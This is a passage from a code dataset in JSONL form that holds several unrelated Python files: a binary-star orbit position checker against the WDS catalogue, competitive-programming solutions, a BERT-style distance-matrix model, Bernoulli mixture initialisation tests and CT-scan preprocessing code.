error\r\n self.calc_pos_pa_err_max = 0 # + error\r\n self.calc_pos_sep_err_max = 0 # + error\r\n\r\n return\r\n\r\n @classmethod\r\n def get(cls, text_str):\r\n\r\n coor_2k = text_str[0:10]\r\n disc = text_str[10:17]\r\n comp = text_str[17:22]\r\n date_last = text_str[28:32]\r\n pa_last = text_str[38:44]\r\n sep_last = text_str[46:53]\r\n note = text_str[106:110]\r\n\r\n return cls(coor_2k, disc, comp, date_last, pa_last, sep_last, note)\r\n\r\n def has_orbit(self):\r\n\r\n if self.note[0] == 'O' or self.note[1] == 'O' or self.note[2] == 'O' or \\\r\n self.note[0] == 'C' or self.note[1] == 'C' or self.note[2] == 'C':\r\n\r\n return True\r\n else:\r\n return False\r\n\r\n @staticmethod\r\n def make_header1():\r\n\r\n return '||Observed|Observed|Calculated|Calculated|Difference|Difference|Error Min|Error Min|Error Max|Error Max|'\r\n\r\n @staticmethod\r\n def make_header2():\r\n\r\n return 'Identification|Epoch|Position Angle|Separation|Position Angle|Separation|Position Angle|Separation|' \\\r\n 'Position Angle|Separation|Position Angle|Separation|Orbit Grade|'\r\n\r\n def make_line(self,grade):\r\n\r\n return self.coor_2k + self.disc + self.comp + '|' + str(self.epoch) + '|' + \\\r\n str(self.obsv_pos_pa) + '|' + str(self.obsv_pos_sep) + '|' + str(self.calc_pos_pa) + '|' + \\\r\n str(self.calc_pos_sep) + '|' + str(self.diff_pos_pa) + '|' + str(self.diff_pos_sep) + '|' + \\\r\n str(self.calc_pos_pa_err_min) + '|' + str(self.calc_pos_sep_err_min) + '|' + \\\r\n str(self.calc_pos_pa_err_max) + '|' + str(self.calc_pos_sep_err_max) + '|' + str(grade)+'|'\r\n\r\n @staticmethod\r\n def make_footer1():\r\n\r\n return 'Obs. in wds|With orbits|Not found|Written with orbits|||||'\r\n\r\n @staticmethod\r\n def make_footer2(n1, n2, n3, n4, n5):\r\n\r\n return str(n1) + '|' + str(n2) + '|' + str(n3) + '|' + str(n4) + '|' + str(n5) + '||||'\r\n\r\n @staticmethod\r\n def diff(pa_1, pa_2, sep_1, sep_2): # _1: calc _2: obsv\r\n\r\n add_1 = 0\r\n add_2 = 0\r\n\r\n if pa_2 > 180 > pa_1:\r\n add_2 = 360\r\n elif pa_2 < 180 < pa_1:\r\n add_1 = 360\r\n\r\n diff_pa = abs(round((pa_1 + add_1) - (pa_2 + add_2), 2))\r\n\r\n if diff_pa > 360:\r\n diff_pa -= 360\r\n diff_pa = round(diff_pa, 2)\r\n\r\n diff_sep = abs(round(sep_1 - sep_2, 2))\r\n\r\n return diff_pa, diff_sep\r\n\r\n @staticmethod\r\n def calc(per, alfa, incl, long, time, ecc, node, epoch, max_loops):\r\n\r\n pa = 0\r\n sep = 0\r\n\r\n if per <= 0:\r\n print('! Period <= ZERO - Position cannot be calculated')\r\n else:\r\n c = pi * 2\r\n incl_rad = radians(incl)\r\n node_rad = radians(node)\r\n long_rad = radians(long)\r\n n = c / per\r\n ma = n * (epoch - time)\r\n m = ma - c * int(ma / c)\r\n ea = m\r\n a = ea - (ecc * sin(ea)) - m\r\n loops = 0\r\n while (abs(a) >= 1E-15) and (loops < max_loops):\r\n loops += 1\r\n a = a / (1 - (ecc * cos(ea)))\r\n ea = ea - a\r\n a = ea - (ecc * sin(ea)) - m\r\n if loops == max_loops:\r\n print('! Calculation of anomaly requires > max_loops - stopped - cannot calculate')\r\n else:\r\n tu = sqrt((1 + ecc) / (1 - ecc)) * tan(ea / 2)\r\n nu = 2 * atan(tu)\r\n r = alfa - alfa * ecc * cos(ea)\r\n y = sin(nu + long_rad) * cos(incl_rad)\r\n x = cos(nu + long_rad)\r\n q = atan(y / x)\r\n if x < 0:\r\n q = q + pi\r\n else:\r\n if q < 0:\r\n q = q + c\r\n th = q + node_rad\r\n if th > c:\r\n th = th - c\r\n rh = r * x / cos(q)\r\n pa = int(th / radians(1) * 10 + 0.5) / 10\r\n sep = int(rh * 100 + 0.5) / 100\r\n\r\n return pa, sep\r\n\r\n\r\nclass Orbit:\r\n\r\n def __init__(self, wds, disc, peri, peri_unit, peri_error, alfa, alfa_error, alfa_unit, incl, incl_error, node,\r\n node_error, time_peri, time_unit, time_error, ecc, ecc_error, long, long_error, grade):\r\n\r\n self.wds = wds\r\n self.disc = disc # discoverer designation & components\r\n self.per = float(peri)\r\n self.per_u = peri_unit\r\n self.per_e = float(peri_error)\r\n self.alfa = float(alfa)\r\n self.alfa_u = alfa_unit\r\n self.alfa_e = float(alfa_error)\r\n self.incl = float(incl)\r\n self.incl_e = float(incl_error)\r\n self.node = float(node)\r\n self.node_e = float(node_error)\r\n self.time = float(time_peri)\r\n self.time_u = time_unit\r\n self.time_e = float(time_error)\r\n self.ecc = float(ecc)\r\n self.ecc_e = float(ecc_error)\r\n self.long = float(long)\r\n self.long_e = float(long_error)\r\n self.grade = int(grade)\r\n self.calc = True\r\n\r\n def show_error(self):\r\n\r\n return self.wds + str(self.per_e) + '|' + str(self.alfa_e) + '|' + str(self.incl_e) + '|' + \\\r\n str(self.node_e) + '|' + str(self.time_e) + '|' + str(self.ecc_e) + '|' + str(self.long_e) + '|'\r\n\r\n @classmethod\r\n def get(cls, text_str):\r\n\r\n ra, dec, wds, disc, ads, hd, hip, mag1, mag_flag1, vis_mag2, mag_flag2, peri, peri_unit, peri_error, alfa, \\\r\n alfa_unit, alfa_error, incl, incl_error, node, node_asc, node_error, time_peri, time_unit, \\\r\n time_error, ecc, ecc_error, long, long_error, eqnx, last_obs, grade, notes, ref, name \\\r\n = text_str.split('|')\r\n\r\n def c0(c):\r\n if c == '' or c == '--.':\r\n return '0'\r\n else:\r\n return c\r\n\r\n return cls(wds, disc, c0(peri), peri_unit, c0(peri_error), c0(alfa), c0(alfa_error), alfa_unit, c0(incl),\r\n c0(incl_error),c0(node), c0(node_error), c0(time_peri), time_unit, c0(time_error), c0(ecc),\r\n c0(ecc_error), c0(long), c0(long_error), c0(grade))\r\n\r\n def is_calcuable(self):\r\n\r\n if self.grade in range(1, 6) and self.per_u == 'y' and self.alfa_u == 'a':\r\n return True\r\n else:\r\n self.calc = False # overwrite to skip\r\n return False\r\n\r\n def make_line(self):\r\n\r\n return self.wds + self.disc + '|' + str(self.per) + '|' + self.per_u + '|' + str(self.alfa) + '|' + \\\r\n str(self.incl) + '|' + str(self.node) + '|' + str(self.time) + '|' + str(self.ecc) + '|' + \\\r\n str(self.long) + '|' + str(self.grade) + '|'\r\n\r\n def append_orbit_elt(self):\r\n\r\n orb_wds_disc.append(self.wds+self.disc)\r\n \r\n orb_per.append(self.per)\r\n orb_alfa.append(self.alfa)\r\n orb_incl.append(self.incl)\r\n orb_node.append(self.node)\r\n orb_time.append(self.time)\r\n orb_ecc.append(self.ecc)\r\n orb_long.append(self.long)\r\n orb_grade.append(self.grade)\r\n\r\n orb_may_be_calc.append(self.calc)\r\n\r\n orb_per_e.append(self.per_e)\r\n orb_alfa_e.append(self.alfa_e) \r\n orb_incl_e.append(self.incl_e) \r\n orb_node_e.append(self.node_e) \r\n orb_time_e.append(self.time_e) \r\n orb_ecc_e.append(self.ecc_e) \r\n orb_long_e.append(self.long_e)\r\n\r\n if self.per_e == 0 and self.alfa_e == 0 and self.incl_e == 0 and self.node_e == 0 and self.time_e == 0 and \\\r\n self.ecc_e == 0 and self.long_e == 0:\r\n errors = False\r\n else:\r\n errors = True\r\n orb_has_errors.append(errors)\r\n\r\n return\r\n\r\ndef get_wds_make_files(max_loops, acc_pa, acc_sep, calc_with_errors):\r\n\r\n f = open('Input_Files/wds_precise.txt', 'r') # all last precise positions in wds\r\n pn = open('Output_Files/not found key in 6thorbit.txt', 'w') # orbit not found (key reference missing or inexact)\r\n p0 = open('Output_Files/wds_positions_all.txt', 'w') # last precise positions of physical pairs (...have orbits)\r\n p1 = open('Output_Files/wds_positions_acc.txt', 'w') # difference in PA <= acc_pa and difference in Sep. <= acc_sep\r\n p2 = open('Output_Files/wds_positions_pa_off.txt', 'w') # PA > acc_pa and Sep. <= acc_sep\r\n p3 = open('Output_Files/wds_positions_sep_off.txt', 'w') # PA <= acc_pa and Sep. > acc_sep\r\n p4 = open('Output_Files/wds_positions_pa_sep_off.txt', 'w') # PA > acc_pa and Sep. > acc_sep\r\n\r\n global no_of_with_orbits\r\n no_of_wds_obsv = 0\r\n no_of_with_orbits = 0\r\n no_of_not_found = 0\r\n no_of_skipped = 0\r\n no_of_with_orbits_write = 0\r\n\r\n pn.write(Position.make_header1())\r\n pn.write('\\n')\r\n pn.write(Position.make_header2())\r\n pn.write('\\n')\r\n p0.write(Position.make_header1())\r\n p0.write('\\n')\r\n p0.write(Position.make_header2())\r\n p0.write('\\n')\r\n p1.write(Position.make_header1())\r\n p1.write('\\n')\r\n p1.write(Position.make_header2())\r\n p1.write('\\n')\r\n p2.write(Position.make_header1())\r\n p2.write('\\n')\r\n p2.write(Position.make_header2())\r\n p2.write('\\n')\r\n p3.write(Position.make_header1())\r\n p3.write('\\n')\r\n p3.write(Position.make_header2())\r\n p3.write('\\n')\r\n p4.write(Position.make_header1())\r\n p4.write('\\n')\r\n p4.write(Position.make_header2())\r\n p4.write('\\n')\r\n\r\n for pos in f:\r\n no_of_wds_obsv += 1\r\n ix = 0\r\n w = Position.get(pos)\r\n if Position.has_orbit(w):\r\n no_of_with_orbits += 1\r\n comp_with_spc = w.comp\r\n comp_with_no_spc = comp_with_spc.rstrip()\r\n try:\r\n ix = orb_wds_disc.index(w.coor_2k+w.disc+comp_with_no_spc)\r\n if orb_may_be_calc[ix]:\r\n print('Calculating Position of '+w.coor_2k+w.disc+comp_with_no_spc)\r\n w.calc_pos_pa, w.calc_pos_sep = Position.calc(orb_per[ix], orb_alfa[ix],\r\n orb_incl[ix], orb_long[ix],\r\n orb_time[ix], orb_ecc[ix],\r\n orb_node[ix], w.epoch, max_loops)\r\n\r\n w.diff_pos_pa, w.diff_pos_sep = Position.diff(w.calc_pos_pa, w.obsv_pos_pa, w.calc_pos_sep, w.obsv_pos_sep)\r\n\r\n if calc_with_errors:\r\n if orb_has_errors[ix]:\r\n print('Calculating with Errors - Differences of ' + w.coor_2k + w.disc + comp_with_no_spc)\r\n w.calc_pos_pa_err_min, calc_pos_sep_err_min = Position.calc(orb_per[ix] - orb_per_e[ix],\r\n orb_alfa[ix] - orb_alfa_e[ix],\r\n orb_incl[ix] - orb_incl_e[ix],\r\n orb_long[ix] - orb_long_e[ix],\r\n orb_time[ix] - orb_time_e[ix],\r\n orb_ecc[ix] - orb_ecc_e[ix],\r\n orb_node[ix] - orb_node_e[ix],\r\n w.epoch, max_loops)\r\n\r\n w.calc_pos_pa_err_max, calc_pos_sep_err_max = Position.calc(orb_per[ix] + orb_per_e[ix],\r\n orb_alfa[ix] + orb_alfa_e[ix],\r\n orb_incl[ix] + orb_incl_e[ix],\r\n orb_long[ix] + orb_long_e[ix],\r\n orb_time[ix] + orb_time_e[ix],\r\n orb_ecc[ix] + orb_ecc_e[ix],\r\n orb_node[ix] + orb_node_e[ix],\r\n w.epoch, max_loops)\r\n\r\n p0.write(Position.make_line(w, orb_grade[ix])) # all\r\n p0.write('\\n')\r\n no_of_with_orbits_write += 1\r\n \r\n # split into files depending on difference in OBSV-CALC pa & sep\r\n if abs(w.diff_pos_pa) <= acc_pa and abs(w.diff_pos_sep) <= acc_sep:\r\n p1.write(Position.make_line(w, orb_grade[ix])) # pa & sep within range\r\n p1.write('\\n')\r\n elif abs(w.diff_pos_pa) > acc_pa and abs(w.diff_pos_sep) <= acc_sep:\r\n p2.write(Position.make_line(w, orb_grade[ix])) # pa outside range\r\n p2.write('\\n')\r\n elif abs(w.diff_pos_pa) <= acc_pa and abs(w.diff_pos_sep) > acc_sep:\r\n p3.write(Position.make_line(w, orb_grade[ix])) # sep outside range\r\n p3.write('\\n')\r\n else:\r\n p4.write(Position.make_line(w, orb_grade[ix])) # pa & sep outside range\r\n p4.write('\\n')\r\n else:\r\n no_of_skipped += 1 # may not be calculated\r\n\r\n except ValueError: # is supposed to have orbit in 6th but none exists!? id. problem!\r\n pn.write(Position.make_line(w, 0))\r\n pn.write('\\n')\r\n no_of_not_found += 1\r\n\r\n del w # delete instance from memory\r\n\r\n p0.write(Position.make_footer1())\r\n p0.write('\\n')\r\n p0.write(Position.make_footer2(no_of_wds_obsv, no_of_with_orbits, no_of_not_found, no_of_with_orbits_write, no_of_skipped))\r\n p0.write('\\n')\r\n\r\n pn.close()\r\n p0.close()\r\n p1.close()\r\n p2.close()\r\n p3.close()\r\n p4.close()\r\n f.close()\r\n\r\n print('No of wds obsv. read : ', no_of_wds_obsv)\r\n print(' with orbits : ', no_of_with_orbits)\r\n print(' with orbits written : ', no_of_with_orbits_write)\r\n print(' rejected (incalcuable): ', no_of_skipped)\r\n print(' not found (wrong id.) : ', no_of_not_found)\r\n\r\n\r\ndef get_orbits():\r\n\r\n f = open('Input_Files/orb6orbits with pipe.txt', 'r') # all orbits in 6th cat.\r\n c = open('Output_Files/calcuable orbits.txt', 'w') # all orbits with high grade orbits and periods in years\r\n s = open('Output_Files/skipped orbits.txt', 'w') # orbits rejected\r\n\r\n no_of_calcuable = 0\r\n no_of_rejected = 0\r\n no_of_orbits = 0\r\n\r\n f.readline() # read header 1\r\n f.readline() # read header 2\r\n for orbit in f: # read orbital data\r\n no_of_orbits += 1\r\n o = Orbit.get(orbit)\r\n if Orbit.is_calcuable(o): # may set to skip = 1\r\n no_of_calcuable += 1\r\n c.write(Orbit.make_line(o))\r\n c.write('\\n')\r\n else:\r\n no_of_rejected += 1\r\n s.write(f'{o.wds} skipped due to grade {o.grade}, period unit {o.per_u}, alfa unit {o.alfa_u}')\r\n s.write('\\n')\r\n\r\n Orbit.append_orbit_elt(o) # store in array regardless of skipped or not\r\n\r\n del o # delete instance from memory\r\n\r\n f.close()\r\n c.close()\r\n s.close()\r\n\r\n print('No of read 6th cat. orbits :', no_of_orbits)\r\n print(' rejected (grade, period- or alfa-unit) :', no_of_rejected)\r\n print(' calcuable :', no_of_calcuable)\r\n\r\n return\r\n\r\n# --------------- \"Mission Control\" --------------\r\nget_orbits()\r\nget_wds_make_files(30000, 0,0,True) # max_loops for anomaly, diff in pa, diff. in sep, boolean calc_with_errors\r\n# ------------------------------------------------\r\n","repo_name":"MBKastro/astronomical-stuff","sub_path":"OO_DS.py","file_name":"OO_DS.py","file_ext":"py","file_size_in_byte":17671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9986556342","text":"'''Defines stateless utility functions\n'''\nfrom src.core import Atom\n\n\ndef is_intensional(atom: Atom):\n '''Checks if the atom is intensional. If true returns true, otherwise returns false\n\n Arguments:\n atom {Atom} -- Atom to be analyzed\n '''\n for term in atom.terms:\n if not term.isVariable:\n return False\n\n return True\n\n\ndef printProgressBar(iteration, total, prefix='', suffix='', decimals=1, length=100, fill='█'):\n \"\"\"\n Call in a loop to create terminal progress bar\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent complete (Int)\n length - Optional : character length of bar (Int)\n fill - Optional : bar fill character (Str)\n \"\"\"\n total -= 1\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 *\n (iteration / float(total)))\n filledLength = int(length * iteration // total)\n bar = fill * filledLength + '-' * (length - filledLength)\n print('\\r%s |%s| %s%% %s' % (prefix, bar, percent, suffix), end='\\r')\n # Print New Line on Complete\n if iteration == total:\n print()\n\n\nINTENSIONAL_REQUIRED_MESSAGE = 'Atom is not intensional'\n","repo_name":"ai-systems/DILP-Core","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"53"} +{"seq_id":"32346288363","text":"def breakingRecords(scores):\n min, max, minimum, maximum = 0, 0, 0, 0\n for i in range(len(scores)):\n if i==0:\n minimum = scores[i]\n maximum = scores[i]\n continue\n if scores[i] > maximum:\n maximum = scores[i]\n max += 1\n if scores[i] < minimum:\n minimum = scores[i]\n min += 1\n return max, min\n\nscores = [10,5,20,20,4,5,2,25,1]\nprint(breakingRecords(scores))\n","repo_name":"wisehero/thisiscodingtest","sub_path":"python/haker_rank/breaking_the_records.py","file_name":"breaking_the_records.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27928855","text":"n = int(input())\nA = [list(map(int, input().split())) for _ in range(n)]\nB = [list(map(int, input().split())) for _ in range(n)]\n\nans = True\nrotated_A = A\nfor i in range(4):\n for aj, bj in zip(rotated_A, B):\n for ak, bk in zip(aj, bj):\n if ans and ak == 1 and bk != 1:\n ans = False\n break\n rotated_A = list(zip(*rotated_A[::-1]))\n \n if ans:\n print(\"Yes\")\n exit()\n ans = True\nprint(\"No\")\n \n\n ","repo_name":"mizutaninaoki/AtCoderPractice","sub_path":"contest/abc/abc298/b/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16392212993","text":"import torch.nn as nn\nfrom .bert import BERT\n\n\nclass InterDM(nn.Module):\n \"\"\"\n BERT Language Model\n Next Sentence Prediction Model + Masked Language Model\n \"\"\"\n\n def __init__(self, vocab_size, hidden=128, n_layers=1, attn_heads=8,\n dm_hidden=16,\n seq_mode='two',\n abs_position_embed=True,\n relative_attn=False,\n relative_1d=False,\n max_relative_1d_positions=10,\n relative_3d=False,\n relative_3d_vocab_size=10):\n\n super().__init__()\n self.seq_mode = seq_mode\n\n self.bert = BERT(vocab_size, hidden=hidden, n_layers=n_layers, attn_heads=attn_heads,\n seq_mode=seq_mode,\n abs_position_embed=abs_position_embed,\n relative_attn=relative_attn,\n relative_1d=relative_1d,\n max_relative_1d_positions=max_relative_1d_positions,\n relative_3d=relative_3d,\n relative_3d_vocab_size=relative_3d_vocab_size)\n\n self.dist_mat_pred = DistMatPrediction(hidden, dm_hidden, relative_3d_vocab_size)\n\n def forward(self, x, segment_label=None, distance_matrix=None):\n x = self.bert(x, segment_label, distance_matrix)\n # dist_mat = self._get_dist_mat(x, segment_label)\n dist_mat = self.dist_mat_pred(x)\n return dist_mat\n\n # def _get_dist_mat(self, x, segment_label):\n # \"\"\"\n # use the angular alignment of two vectors as their distance?\n # use (x1-x2) as distance?\n # \"\"\"\n # t1 = segment_label[segment_label == 1].size(0)\n # t2 = segment_label[segment_label == 2].size(0)\n # x1 = x[:, 1:t1-1] # exclude the padded sos_index and eos_index\n # x2 = x[:, t1:t1+t2-1] # exclude the padded eos_index\n # x1 = x1[None, :, :, :]\n # x2 = x2[:, None, :, :]\n # x12 = (x1 * x2).sum(dim=3)\n # dist_mat = x12 #\n # return dist_mat\n\n\nclass DistMatPrediction(nn.Module):\n \"\"\"\n # map the seq vector to distance\n \"\"\"\n def __init__(self, hidden, dm_hidden, relative_3d_vocab_size):\n super().__init__()\n # exclude sos_index, eos_index, pad_index, inter_12 from the vocab\n d_size = relative_3d_vocab_size-4 # number of distance class + no_msa\n self.linear1 = nn.Linear(hidden, dm_hidden)\n self.linear2 = nn.Linear(dm_hidden, d_size)\n self.softmax = nn.LogSoftmax(dim=-1)\n\n def forward(self, x):\n \"\"\"\n :param x: shape (N, S, E)\n :return: dist_mat, shape (N, d_size, S, S)\n \"\"\"\n # t1 = segment_label[segment_label == 1].size(0)\n # t2 = segment_label[segment_label == 2].size(0)\n # x1 = x[:, 1:t1-1] # exclude the padded sos_index and eos_index\n # x2 = x[:, t1:t1+t2-1] # exclude the padded eos_index\n # x1 = x1[:, :, None, :] # shape (N, t1-2, 1, E)\n # x2 = x2[:, None, :, :] # shape (N, 1, t2-1, E)\n\n x = self.linear1(x)\n x1 = x[:, :, None, :] # shape (N, S, 1, E)\n x2 = x[:, None, :, :] # shape (N, 1, S, E)\n\n dist_mat = self.softmax(self.linear2((x1-x2)**2)) # (N, S, S, d_size)\n dist_mat = dist_mat.transpose(1, 3) # (N, d_size, S, S)\n return dist_mat\n\n\nclass NextSentencePrediction(nn.Module):\n \"\"\"\n 2-class classification model : is_next, is_not_next\n \"\"\"\n\n def __init__(self, hidden):\n \"\"\"\n :param hidden: BERT model output size\n \"\"\"\n super().__init__()\n self.linear = nn.Linear(hidden, 2)\n self.softmax = nn.LogSoftmax(dim=-1)\n\n def forward(self, x):\n return self.softmax(self.linear(x[:, 0]))\n\n","repo_name":"lahplover/unippi","sub_path":"model/distmat_model.py","file_name":"distmat_model.py","file_ext":"py","file_size_in_byte":3765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72181331048","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport unittest\n\nimport numpy as np\nfrom numpy.testing import assert_array_equal, assert_array_almost_equal\n\nfrom bernoullimix.random_initialisation import _adjust_probabilities, _expected_domain, \\\n _random_numbers_within_domain, _random_rows_from_dataset, random_mixture_generator\n\nimport pandas as pd\nimport itertools\n\n\n\nclass TestProbabilityAdjustment(unittest.TestCase):\n\n def test_probabilities_are_adjusted_correctly_given_domain(self):\n\n domain = (-5, 5)\n epsilon = 0.05\n\n test_array = np.array([-5.0, 5.0, 0.0, 4.0])\n\n expected_result = np.array([epsilon,\n 1-epsilon,\n 0.5, ((4.0 - (-5))/10) * (1-2*epsilon) + epsilon])\n\n actual_result = _adjust_probabilities(test_array, epsilon, domain=domain)\n assert_array_almost_equal(expected_result, actual_result)\n\n def test_probabilities_are_adjusted_correctly_given_domain_2d(self):\n domain = (-5, 5)\n epsilon = 0.05\n\n test_array = np.array([[-5.0, 5.0],\n [0.0, 4.0]])\n\n expected_result = np.array([[epsilon, 1 - epsilon],\n [0.5, ((4.0 - (-5)) / 10) * (1 - 2 * epsilon) + epsilon]])\n\n actual_result = _adjust_probabilities(test_array, epsilon, domain=domain)\n assert_array_almost_equal(expected_result, actual_result)\n\n def test_probabilities_out_of_domain_raise_value_error(self):\n epsilon = 0.05\n\n test_array = np.array([-5.0, 5.0, 0.0, 4.0])\n\n # Low side\n self.assertRaises(ValueError, _adjust_probabilities,\n test_array, epsilon, domain=(-4.0, 5.0))\n\n # High side\n self.assertRaises(ValueError, _adjust_probabilities,\n test_array, epsilon, domain=(-5.0, 4.0))\n\n def test_ill_specified_domain_raises_value_error(self):\n epsilon = 0.05\n\n test_array = np.array([-5.0, 5.0, 0.0, 4.0])\n\n # domain[0] > domain[1]\n self.assertRaises(ValueError, _adjust_probabilities,\n test_array, epsilon, domain=(5.0, -5.0))\n\n # domain[0] == domain[1]\n self.assertRaises(ValueError, _adjust_probabilities,\n test_array, epsilon, domain=(5.0, 5.0))\n\nclass TestDomainCalculation(unittest.TestCase):\n\n def test_domain_is_computed_correctly_when_alpha_is_zero_or_one(self):\n\n domain_a = (0, 1)\n domain_b = (-5, 5)\n\n expected_alpha_zero = domain_b\n expected_alpha_one = domain_a\n\n actual_alpha_zero = _expected_domain(domain_a, domain_b, alpha=0)\n actual_alpha_one = _expected_domain(domain_a, domain_b, alpha=1)\n\n self.assertEqual(expected_alpha_one, actual_alpha_one)\n self.assertEqual(expected_alpha_zero, actual_alpha_zero)\n\n def test_domain_computation_fails_for_bad_alpha(self):\n domain_a = (0, 1)\n domain_b = (-5, 5)\n\n # Negative alpha\n self.assertRaises(ValueError, _expected_domain, domain_a, domain_b,\n alpha=-1)\n # Alpha greater than One\n self.assertRaises(ValueError,\n _expected_domain, domain_a, domain_b,\n alpha=1.1)\n\n def test_domain_stays_the_same_when_both_domains_equal(self):\n domain_a = domain_b = (0, 1)\n\n expected = domain_a\n\n # Regardless of alpha:\n actual_0_1 = _expected_domain(domain_a, domain_b, alpha=0.1)\n actual_0_3 = _expected_domain(domain_a, domain_b, alpha=0.3)\n actual_0_5 = _expected_domain(domain_a, domain_b, alpha=0.5)\n actual_0_7 = _expected_domain(domain_a, domain_b, alpha=0.7)\n\n self.assertEqual(expected, actual_0_1)\n self.assertEqual(expected, actual_0_3)\n self.assertEqual(expected, actual_0_5)\n self.assertEqual(expected, actual_0_7)\n\n def test_domain_computed_correctly_for_different_domains(self):\n domain_a = (-1, 1)\n domain_b = (0, 1)\n\n alpha = 0.75\n\n expected = (domain_a[0] * alpha + domain_b[0] * (1-alpha),\n domain_a[1] * alpha + domain_b[1] * (1 - alpha))\n\n actual = _expected_domain(domain_a, domain_b, alpha)\n\n self.assertEqual(expected, actual)\n\nclass TestRandomNumberGeneration(unittest.TestCase):\n\n def _isin_domain_func(self, domain):\n return np.vectorize(lambda x: domain[0] <= x <= domain[1])\n\n def test_random_number_generator_produces_numbers_within_correct_domain(self):\n\n domain_a = (17.0, 130.0)\n domain_b = (-5.0, -4)\n\n random = np.random.RandomState(12345)\n\n numbers_a = _random_numbers_within_domain(random, domain_a, (10,))\n numbers_b = _random_numbers_within_domain(random, domain_b, (10,))\n\n isin_domain_a = self._isin_domain_func(domain_a)\n isin_domain_b = self._isin_domain_func(domain_b)\n\n all_in_a = np.all(isin_domain_a(numbers_a))\n all_in_b = np.all(isin_domain_b(numbers_b))\n\n self.assertTrue(all_in_a, 'Some numbers not in the domain {}:\\n{!r}'.format(domain_a,\n numbers_a))\n\n self.assertTrue(all_in_b, 'Some numbers not in the domain {}:\\n{!r}'.format(domain_b,\n numbers_b))\n\n def test_random_number_generator_samples_numbers_within_whole_domain(self):\n\n linspace = np.linspace(-1, 1, 10)\n complete_domain = linspace[0], linspace[-1]\n\n subdomains = zip(linspace, linspace[1:])\n\n random = np.random.RandomState(12345)\n\n numbers_to_generate = 10000\n\n numbers = _random_numbers_within_domain(random, complete_domain, (numbers_to_generate, ))\n\n for subdomain in subdomains:\n isin_subdomain = self._isin_domain_func(subdomain)\n\n some_in_subdomain = np.any(isin_subdomain(numbers))\n\n self.assertTrue(some_in_subdomain,\n 'Out of {:,} numbers generated for {} '\n 'none in domain {}'.format(numbers_to_generate,\n complete_domain,\n subdomain))\n\n def test_random_rows_returned_replace_missing_data_with_a_random_guess(self):\n\n dataset = pd.DataFrame([[True, None, True]])\n\n random = np.random.RandomState(1207)\n\n expected_answers = {(True, True, True), (True, False, True)}\n\n answers = set()\n for __ in range(100):\n random_rows = _random_rows_from_dataset(dataset, n_rows=1, random=random)\n\n random_rows = tuple(random_rows.iloc[0, :])\n\n answers.add(random_rows)\n\n self.assertSetEqual(expected_answers, answers)\n\nclass TestRandomInitialiserSeeding(unittest.TestCase):\n\n def test_random_initialiser_always_returns_the_same_model_with_the_same_seed(self):\n\n data = pd.DataFrame([[True, False, None, 'dataset-a', 2.5],\n [False, False, None, 'dataset-a', 2.5],\n [False, True, True, 'dataset-a', 2.5]],\n columns=['X1', 'X2', 'X3', 'dataset_id', 'weight'])\n\n seed = 12345\n\n times_to_try = 10\n mixtures_to_generate = 10\n number_of_components = 3\n\n initial_try = list(itertools.islice(random_mixture_generator(number_of_components,\n data,\n random_state=seed),\n mixtures_to_generate))\n\n for attempt in range(1, times_to_try+1):\n current_try = list(itertools.islice(random_mixture_generator(number_of_components,\n data,\n random_state=seed),\n mixtures_to_generate))\n\n self.assertListEqual(initial_try, current_try)","repo_name":"lukauskas/bernoulli-mixture-model","sub_path":"bernoullimix/test/test_random_mixture_generator.py","file_name":"test_random_mixture_generator.py","file_ext":"py","file_size_in_byte":8303,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"18199303880","text":"import os\nimport os.path as osp\nimport numpy as np\nfrom tqdm import tqdm\nimport SimpleITK as sitk\nimport numpy as np\nfrom pathlib import Path\nfrom types import SimpleNamespace\nimport sys\nfrom typing import List \nimport cv2\nimport progressbar\n\n\ncfg = {\n \"chest\": {\"lungs\": [{\"W\": 1500, \"L\": -600}], \"mediastinum\": [{\"W\": 350, \"L\": 50}]},\n \"abdomen\": {\"soft tissues\": [{\"W\": 400, \"L\": 50}], \"liver\": [{\"W\": 150, \"L\": 30}]},\n \"spine\": {\"soft tissues\": [{\"W\": 250, \"L\": 50}], \"bone\": [{\"W\": 1800, \"L\": 400}]},\n}\n\ndef get_cfg(key, cfg=cfg):\n if isinstance(key, str):\n if \"-\" in key:\n key = key.split(\"-\")\n key = [k.strip() for k in key]\n\n for k in key:\n if k in cfg:\n cfg = cfg[k]\n else:\n raise ValueError(f\"{k} not in cfg\")\n return cfg\n \n if isinstance(key, List):\n res = []\n for c in key:\n res += get_cfg(c, cfg)\n return res\n\ndef load_ct_info(file_path):\n sitk_image = sitk.ReadImage(file_path)\n if sitk_image is None:\n res = {}\n else:\n origin = sitk_image.GetOrigin() # original used list(reversed(, dont know why\n spacing = sitk_image.GetSpacing() # original used list(reversed(, dont know why\n direction = sitk_image.GetDirection()\n subdirection = [direction[8], direction[4], direction[0]]\n res = {\"sitk_image\": sitk_image,\n \"npy_image\": sitk.GetArrayFromImage(sitk_image),\n \"origin\": origin,\n \"spacing\": spacing,\n \"direction\": direction,\n \"subdirection\": subdirection}\n return res\n\ndef change_axes_of_image(npy_image, orientation):\n '''default orientation=[1, -1, -1]'''\n if orientation[0] < 0:\n npy_image = np.flip(npy_image, axis=0)\n if orientation[1] > 0:\n npy_image = np.flip(npy_image, axis=1)\n if orientation[2] > 0:\n npy_image = np.flip(npy_image, axis=2)\n return npy_image\n\ndef convert_2_npy(vol_path):\n image_dict = load_ct_info(vol_path)\n subdirection = image_dict[\"subdirection\"]\n\n image_dict[\"npy_image\"] = change_axes_of_image(\n image_dict[\"npy_image\"], subdirection\n )\n npy_image 